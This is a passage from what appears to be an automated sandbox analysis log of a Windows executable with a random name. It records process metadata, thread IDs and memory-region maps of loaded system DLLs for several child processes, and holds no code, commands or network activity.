0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7125 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7126 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7127 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7684 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7685 start_va = 0x8d0000 end_va = 0xa57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 7686 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 237 os_tid = 0x7f4 Thread: id = 267 os_tid = 0x13bc Process: id = "74" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xb6d4000" os_pid = "0x13fc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6501 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6502 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6503 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6504 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6505 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6506 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6507 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6508 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6509 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6510 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6511 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6512 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6513 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6514 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6515 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6516 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 6748 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 6749 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6750 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6751 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6752 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6753 start_va = 0x440000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 6754 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6755 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6772 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6773 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6774 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6775 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 7159 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7160 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7161 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 7162 start_va = 0x6f0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 7163 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7164 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7165 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7166 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7167 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7168 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7169 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7170 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7171 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7172 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7173 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7174 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7175 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7176 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7177 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7178 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7179 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7180 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7529 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7687 start_va = 0x540000 end_va = 0x569fff monitored = 0 entry_point = 0x545680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7688 start_va = 0x7f0000 end_va = 0x977fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 7707 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 238 os_tid = 0x1004 Thread: id = 269 os_tid = 0x104c Process: id = "75" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xb7d9000" os_pid = "0xd4c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6522 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6523 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6524 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6525 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6526 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6527 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6528 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6529 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6530 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6531 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6532 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6533 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6534 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6535 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6536 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6537 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 6790 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 6791 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6792 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6809 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6810 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7215 start_va = 0x5d0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 7216 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7217 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7218 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7219 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 7220 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7221 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7222 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7223 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 7224 start_va = 0x7c0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 7225 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7226 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7227 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7228 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7229 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7546 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7547 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7548 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7549 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7550 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7551 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7552 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7553 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7554 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7555 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7556 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7557 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7558 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7559 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7805 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7806 start_va = 0x8c0000 end_va = 0xa47fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 7807 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 239 os_tid = 0x2e4 Thread: id = 271 os_tid = 0x1044 Process: id = "76" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x54ade000" os_pid = "0xec8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6543 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6544 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6545 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6546 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6547 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6548 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6549 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6550 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6551 start_va = 